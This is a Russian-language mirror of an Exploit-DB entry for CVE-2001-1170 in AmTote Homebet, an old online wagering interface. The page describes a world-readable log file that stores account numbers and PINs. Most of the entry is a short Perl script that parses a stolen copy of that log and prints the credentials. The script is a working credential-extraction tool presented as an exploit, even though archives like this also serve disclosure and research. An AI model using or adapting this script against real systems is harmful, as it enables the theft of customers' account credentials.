- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21115
- Проверка EDB
-
- Пройдено
- Автор
- GARY O'LEARY-STEELE
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2001-1170
- Дата публикации
- 2001-09-28
Код:
source: https://www.securityfocus.com/bid/3370/info
AmTote Homebet is an Internet-based account wagering interface.
Homebet stores all account and corresponding PIN numbers in the homebet.log file stored in the Homebet virtual directory. On a default installation, the homebet.log file is world readable. This could allow an attacker to steal the log file and strip out the account and PIN numbers.
$logfile='c:\windows\desktop\homebet.log'; ##change as required
print "Extracting Account/pin numbers";
open(INFILE,$logfile);
while(<INFILE>){
($accn,$pin)=split(/account=/,$_);
if ($pin){print "Account Number=".$pin;}
}- Источник
- www.exploit-db.com
